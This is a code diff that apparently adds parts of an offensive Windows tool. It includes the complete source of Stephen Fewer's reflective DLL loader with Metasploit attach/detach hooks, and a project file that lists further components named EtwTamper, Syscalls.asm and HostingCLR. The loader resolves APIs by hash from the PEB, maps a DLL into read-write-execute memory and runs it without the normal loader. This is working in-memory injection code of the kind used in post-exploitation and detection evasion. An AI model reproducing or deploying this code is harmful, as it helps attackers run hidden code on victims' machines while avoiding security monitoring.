+    <Filter Include="Headers">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resources">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h">
+      <Filter>Headers</Filter>
+    </ClInclude>
+    <ClInclude Include="targetver.h">
+      <Filter>Headers</Filter>
+    </ClInclude>
+    <ClInclude Include="ReflectiveLoader.h">
+      <Filter>Headers</Filter>
+    </ClInclude>
+    <ClInclude Include="ReflectiveDLLInjection.h">
+      <Filter>Headers</Filter>
+    </ClInclude>
+    <ClInclude Include="HostingCLR.h">
+      <Filter>Headers</Filter>
+    </ClInclude>
+    <ClInclude Include="EtwTamper.h">
+      <Filter>Headers</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="HostingCLR.cpp">
+      <Filter>Sources</Filter>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>Sources</Filter>
+    </ClCompile>
+    <ClCompile Include="Executer.cpp">
+      <Filter>Sources</Filter>
+    </ClCompile>
+    <ClCompile Include="ReflectiveLoader.cpp">
+      <Filter>Sources</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="Syscalls.asm">
+      <Filter>Sources</Filter>
+    </MASM>
+  </ItemGroup>
+</Project>
@@ -0,0 +1,55 @@
+#pragma once
+
+//===============================================================================================//
+// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
+#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
+//===============================================================================================//
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+
+// we declare some common stuff in here...
+
+#define DLL_METASPLOIT_ATTACH	4
+#define DLL_METASPLOIT_DETACH	5
+#define DLL_QUERY_HMODULE		6
+
+#define DEREF( name )*(UINT_PTR *)(name)
+#define DEREF_64( name )*(DWORD64 *)(name)
+#define DEREF_32( name )*(DWORD *)(name)
+#define DEREF_16( name )*(WORD *)(name)
+#define DEREF_8( name )*(BYTE *)(name)
+
+typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID);
+typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
+
+#define DLLEXPORT __declspec( dllexport ) 
+
+//===============================================================================================//
+#endif
+//===============================================================================================//
@@ -0,0 +1,600 @@
+//===============================================================================================//
+// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#include "stdafx.h"
+#include "ReflectiveLoader.h"
+//===============================================================================================//
+// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
+HINSTANCE hAppInstance = NULL;
+//===============================================================================================//
+#pragma intrinsic( _ReturnAddress )
+// This function can not be inlined by the compiler or we will not get the address we expect. Ideally 
+// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of 
+// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics 
+// available (and no inline asm available under x64).
+__declspec(noinline) ULONG_PTR caller(VOID) { return (ULONG_PTR)_ReturnAddress(); }
+//===============================================================================================//
+
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str)
+#else /* ENABLE_OUTPUTDEBUGSTRING */
+#define OUTPUTDBG(str) do{}while(0)
+#endif
+
+// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,  
+//         otherwise the DllMain at the end of this file will be used.
+
+// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
+//         otherwise it is assumed you are calling the ReflectiveLoader via a stub.
+
+// This is our position independent reflective DLL loader/injector
+#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader(LPVOID lpParameter)
+#else
+DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader(VOID)
+#endif
+{
+	// the functions we need
+	LOADLIBRARYA pLoadLibraryA = NULL;
+	GETPROCADDRESS pGetProcAddress = NULL;
+	VIRTUALALLOC pVirtualAlloc = NULL;
+	NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
+#ifdef ENABLE_STOPPAGING
+	VIRTUALLOCK pVirtualLock = NULL;
+#endif
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+	OUTPUTDEBUG pOutputDebug = NULL;
+#endif
+
+	USHORT usCounter;
+
+	// the initial location of this image in memory
+	ULONG_PTR uiLibraryAddress;
+	// the kernels base address and later this images newly loaded base address
+	ULONG_PTR uiBaseAddress;
+
+	// variables for processing the kernels export table
+	ULONG_PTR uiAddressArray;
+	ULONG_PTR uiNameArray;
+	ULONG_PTR uiExportDir;
+	ULONG_PTR uiNameOrdinals;
+	DWORD dwHashValue;
+
+	// variables for loading this image
+	ULONG_PTR uiHeaderValue;
+	ULONG_PTR uiValueA;
+	ULONG_PTR uiValueB;
+	ULONG_PTR uiValueC;
+	ULONG_PTR uiValueD;
+	ULONG_PTR uiValueE;
+
+	// STEP 0: calculate our images current base address
+
+	// we will start searching backwards from our callers return address.
+	uiLibraryAddress = caller();
+
+	// loop through memory backwards searching for our images base address
+	// we dont need SEH style search as we shouldnt generate any access violations with this
+	while (TRUE)
+	{
+		if (((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE)
+		{
+			uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
+			// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
+			// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
+			if (uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024)
+			{
+				uiHeaderValue += uiLibraryAddress;
+				// break if we have found a valid MZ/PE header
+				if (((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE)
+					break;
+			}
+		}
+		uiLibraryAddress--;
+	}
+
+	// STEP 1: process the kernels exports for the functions our loader needs...
+
+	// get the Process Enviroment Block
+#ifdef _WIN64
+	uiBaseAddress = __readgsqword(0x60);
+#else
+#ifdef WIN_ARM
+	uiBaseAddress = *(DWORD *)((BYTE *)_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30);
+#else _WIN32
+	uiBaseAddress = __readfsdword(0x30);
+#endif
+#endif
+
+	// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
+	uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
+
+	// get the first entry of the InMemoryOrder module list
+	uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
+	while (uiValueA)
+	{
+		// get pointer to current modules name (unicode string)
+		uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
+		// set bCounter to the length for the loop
+		usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
+		// clear uiValueC which will store the hash of the module name
+		uiValueC = 0;
+
+		// compute the hash of the module name...
+		do
+		{
+			uiValueC = ror((DWORD)uiValueC);
+			// normalize to uppercase if the module name is in lowercase
+			if (*((BYTE *)uiValueB) >= 'a')
+				uiValueC += *((BYTE *)uiValueB) - 0x20;
+			else
+				uiValueC += *((BYTE *)uiValueB);
+			uiValueB++;
+		} while (--usCounter);
+
+		// compare the hash with that of kernel32.dll
+		if ((DWORD)uiValueC == KERNEL32DLL_HASH)
+		{
+			// get this modules base address
+			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
+
+			// get the VA of the modules NT Header
+			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
+
+			// uiNameArray = the address of the modules export directory entry
+			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
+
+			// get the VA of the export directory
+			uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
+
+			// get the VA for the array of name pointers
+			uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames);
+
+			// get the VA for the array of name ordinals
+			uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals);
+
+			usCounter = 3;
+#ifdef ENABLE_STOPPAGING
+			usCounter++;
+#endif
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+			usCounter++;
+#endif
+
+			// loop while we still have imports to find
+			while (usCounter > 0)
+			{
+				// compute the hash values for this function name
+				dwHashValue = _hash((char *)(uiBaseAddress + DEREF_32(uiNameArray)));
+
+				// if we have found a function we want we get its virtual address
+				if (dwHashValue == LOADLIBRARYA_HASH
+					|| dwHashValue == GETPROCADDRESS_HASH
+					|| dwHashValue == VIRTUALALLOC_HASH
+#ifdef ENABLE_STOPPAGING
+					|| dwHashValue == VIRTUALLOCK_HASH
+#endif
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+					|| dwHashValue == OUTPUTDEBUG_HASH
+#endif
+					)
+				{
+					// get the VA for the array of addresses
+					uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
+
+					// use this functions name ordinal as an index into the array of name pointers
+					uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD));
+
+					// store this functions VA
+					if (dwHashValue == LOADLIBRARYA_HASH)
+						pLoadLibraryA = (LOADLIBRARYA)(uiBaseAddress + DEREF_32(uiAddressArray));
+					else if (dwHashValue == GETPROCADDRESS_HASH)
+						pGetProcAddress = (GETPROCADDRESS)(uiBaseAddress + DEREF_32(uiAddressArray));
+					else if (dwHashValue == VIRTUALALLOC_HASH)
+						pVirtualAlloc = (VIRTUALALLOC)(uiBaseAddress + DEREF_32(uiAddressArray));
+#ifdef ENABLE_STOPPAGING
+					else if (dwHashValue == VIRTUALLOCK_HASH)
+						pVirtualLock = (VIRTUALLOCK)(uiBaseAddress + DEREF_32(uiAddressArray));
+#endif
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+					else if (dwHashValue == OUTPUTDEBUG_HASH)
+						pOutputDebug = (OUTPUTDEBUG)(uiBaseAddress + DEREF_32(uiAddressArray));
+#endif
+
+					// decrement our counter
+					usCounter--;
+				}
+
+				// get the next exported function name
+				uiNameArray += sizeof(DWORD);
+
+				// get the next exported function name ordinal
+				uiNameOrdinals += sizeof(WORD);
+			}
+		}
+		else if ((DWORD)uiValueC == NTDLLDLL_HASH)
+		{
+			// get this modules base address
+			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
+
+			// get the VA of the modules NT Header
+			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
+
+			// uiNameArray = the address of the modules export directory entry
+			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
+
+			// get the VA of the export directory
+			uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
+
+			// get the VA for the array of name pointers
+			uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames);
+
+			// get the VA for the array of name ordinals
+			uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals);
+
+			usCounter = 1;
+
+			// loop while we still have imports to find
+			while (usCounter > 0)
+			{
+				// compute the hash values for this function name
+				dwHashValue = _hash((char *)(uiBaseAddress + DEREF_32(uiNameArray)));
+
+				// if we have found a function we want we get its virtual address
+				if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH)
+				{
+					// get the VA for the array of addresses
+					uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
+
+					// use this functions name ordinal as an index into the array of name pointers
+					uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD));
+
+					// store this functions VA
+					if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH)
+						pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)(uiBaseAddress + DEREF_32(uiAddressArray));
+
+					// decrement our counter
+					usCounter--;
+				}
+
+				// get the next exported function name
+				uiNameArray += sizeof(DWORD);
+
+				// get the next exported function name ordinal
+				uiNameOrdinals += sizeof(WORD);
+			}
+		}
+
+		// we stop searching when we have found everything we need.
+		if (pLoadLibraryA
+			&& pGetProcAddress
+			&& pVirtualAlloc
+#ifdef ENABLE_STOPPAGING
+			&& pVirtualLock
+#endif
+			&& pNtFlushInstructionCache
+#ifdef ENABLE_OUTPUTDEBUGSTRING
+			&& pOutputDebug
+#endif
+			)
+			break;
+
+		// get the next entry
+		uiValueA = DEREF(uiValueA);
+	}
+
+	// STEP 2: load our image into a new permanent location in memory...
+
+	// get the VA of the NT Header for the PE to be loaded
+	uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
+
+	// allocate all the memory for the DLL to be loaded into. we can load at any address because we will  
+	// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
+	uiBaseAddress = (ULONG_PTR)pVirtualAlloc(NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+#ifdef ENABLE_STOPPAGING
+	// prevent our image from being swapped to the pagefile
+	pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage);
+#endif
+
+	// we must now copy over the headers
+	uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
+	uiValueB = uiLibraryAddress;
+	uiValueC = uiBaseAddress;
+
+	while (uiValueA--)
+		*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
+
+	// STEP 3: load in all of our sections...
+
+	// uiValueA = the VA of the first section
+	uiValueA = ((ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader);
+
+	// itterate through all sections, loading them into memory.
+	uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
+	while (uiValueE--)
+	{
+		// uiValueB is the VA for this section
+		uiValueB = (uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress);
+
+		// uiValueC if the VA for this sections data
+		uiValueC = (uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData);
+
+		// copy the section over
+		uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
+
+		while (uiValueD--)
+			*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
+
+		// get the VA of the next section
+		uiValueA += sizeof(IMAGE_SECTION_HEADER);
+	}
+
+	// STEP 4: process our images import table...
+
+	// uiValueB = the address of the import directory
+	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
+
+	// we assume there is an import table to process
+	// uiValueC is the first entry in the import table
+	uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress);
+
+	// iterate through all imports until a null RVA is found (Characteristics is mis-named)
+	while (((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics)
+	{
+		OUTPUTDBG("Loading library: ");
+		OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
+		OUTPUTDBG("\n");
+
+		// use LoadLibraryA to load the imported module into memory
+		uiLibraryAddress = (ULONG_PTR)pLoadLibraryA((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
+
+		if (!uiLibraryAddress)
+		{
+			OUTPUTDBG("Loading library FAILED\n");
+
+			uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR);
+			continue;
+		}
+
+		// uiValueD = VA of the OriginalFirstThunk
+		uiValueD = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk);
+
+		// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
+		uiValueA = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk);
+
+		// itterate through all imported functions, importing by ordinal if no name present
+		while (DEREF(uiValueA))
+		{
+			// sanity check uiValueD as some compilers only import by FirstThunk
+			if (uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG)
+			{
+				// get the VA of the modules NT Header
+				uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
+
+				// uiNameArray = the address of the modules export directory entry
+				uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
+
+				// get the VA of the export directory
+				uiExportDir = (uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
+
+				// get the VA for the array of addresses
+				uiAddressArray = (uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
+
+				// use the import ordinal (- export ordinal base) as an index into the array of addresses
+				uiAddressArray += ((IMAGE_ORDINAL(((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal) - ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->Base) * sizeof(DWORD));
+
+				// patch in the address for this imported function
+				DEREF(uiValueA) = (uiLibraryAddress + DEREF_32(uiAddressArray));
+			}
+			else
+			{
+				// get the VA of this functions import by name struct
+				uiValueB = (uiBaseAddress + DEREF(uiValueA));
+
+				OUTPUTDBG("Resolving function: ");
+				OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
+				OUTPUTDBG("\n");
+
+				// use GetProcAddress and patch in the address for this imported function
+				DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress((HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
+			}
+			// get the next imported function
+			uiValueA += sizeof(ULONG_PTR);
+			if (uiValueD)
+				uiValueD += sizeof(ULONG_PTR);
+		}
+
+		// get the next import
+		uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR);
+	}
+
+	// STEP 5: process all of our images relocations...
+
+	// calculate the base address delta and perform relocations (even if we load at desired image base)
+	uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
+
+	// uiValueB = the address of the relocation directory
+	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
+
+	// check if their are any relocations present
+	if (((PIMAGE_DATA_DIRECTORY)uiValueB)->Size)
+	{
+		// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
+		uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress);
+
+		// and we itterate through all entries...
+		while (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock)
+		{
+			// uiValueA = the VA for this relocation block
+			uiValueA = (uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress);
+
+			// uiValueB = number of entries in this relocation block
+			uiValueB = (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC);
+
+			// uiValueD is now the first entry in the current relocation block
+			uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
+
+			// we itterate through all the entries in the current block...
+			while (uiValueB--)
+			{
+				// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
+				// we dont use a switch statement to avoid the compiler building a jump table
+				// which would not be very position independent!
+				if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64)
+					*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
+				else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW)
+					*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
+#ifdef WIN_ARM
+				// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
+				else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T)
+				{
+					register DWORD dwInstruction;
+					register DWORD dwAddress;
+					register WORD wImm;
+					// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
+					dwInstruction = *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD));
+					// flip the words to get the instruction as expected
+					dwInstruction = MAKELONG(HIWORD(dwInstruction), LOWORD(dwInstruction));
+					// sanity chack we are processing a MOV instruction...
+					if ((dwInstruction & ARM_MOV_MASK) == ARM_MOVT)
+					{
+						// pull out the encoded 16bit value (the high portion of the address-to-relocate)
+						wImm = (WORD)(dwInstruction & 0x000000FF);
+						wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
+						wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
+						wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
+						// apply the relocation to the target address
+						dwAddress = ((WORD)HIWORD(uiLibraryAddress) + wImm) & 0xFFFF;
+						// now create a new instruction with the same opcode and register param.
+						dwInstruction = (DWORD)(dwInstruction & ARM_MOV_MASK2);
+						// patch in the relocated address...
+						dwInstruction |= (DWORD)(dwAddress & 0x00FF);
+						dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
+						dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
+						dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
+						// now flip the instructions words and patch back into the code...
+						*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD)) = MAKELONG(HIWORD(dwInstruction), LOWORD(dwInstruction));
+					}
+				}
+#endif
+				else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH)
+					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
+				else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW)
+					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
+
+				// get the next entry in the current relocation block
+				uiValueD += sizeof(IMAGE_RELOC);
+			}
+
+			// get the next entry in the relocation directory
+			uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
+		}
+	}
+
+	// STEP 6: call our images entry point
+
+	// uiValueA = the VA of our newly loaded DLL/EXE's entry point
+	uiValueA = (uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint);
+
+	OUTPUTDBG("Flushing the instruction cache");
+	// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
+	pNtFlushInstructionCache((HANDLE)-1, NULL, 0);
+
+	// call our respective entry point, fudging our hInstance value
+#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+	// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
+	((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter);
+#else
+	// if we are injecting an DLL via a stub we call DllMain with no parameter
+	((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL);
+#endif
+
+	// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
+	return uiValueA;
+}
+//===============================================================================================//
+#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+
+// you must implement this function...
+extern DWORD DLLEXPORT Init(SOCKET socket);
+
+BOOL MetasploitDllAttach(SOCKET socket)
+{
+	Init(socket);
+	return TRUE;
+}
+
+BOOL MetasploitDllDetach(DWORD dwExitFunc)
+{
+	switch (dwExitFunc)
+	{
+	case EXITFUNC_SEH:
+		SetUnhandledExceptionFilter(NULL);
+		break;
+	case EXITFUNC_THREAD:
+		ExitThread(0);
+		break;
+	case EXITFUNC_PROCESS:
+		ExitProcess(0);
+		break;
+	default:
+		break;
+	}
+
+	return TRUE;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
+	BOOL bReturnValue = TRUE;
+
+	switch (dwReason)
+	{
+	case DLL_METASPLOIT_ATTACH:
+		bReturnValue = MetasploitDllAttach((SOCKET)lpReserved);
+		break;
+	case DLL_METASPLOIT_DETACH:
+		bReturnValue = MetasploitDllDetach((DWORD)lpReserved);
+		break;
+	case DLL_QUERY_HMODULE:
+		if (lpReserved != NULL)
+			*(HMODULE *)lpReserved = hAppInstance;
+		break;
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hinstDLL;
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+	return bReturnValue;
+}
+
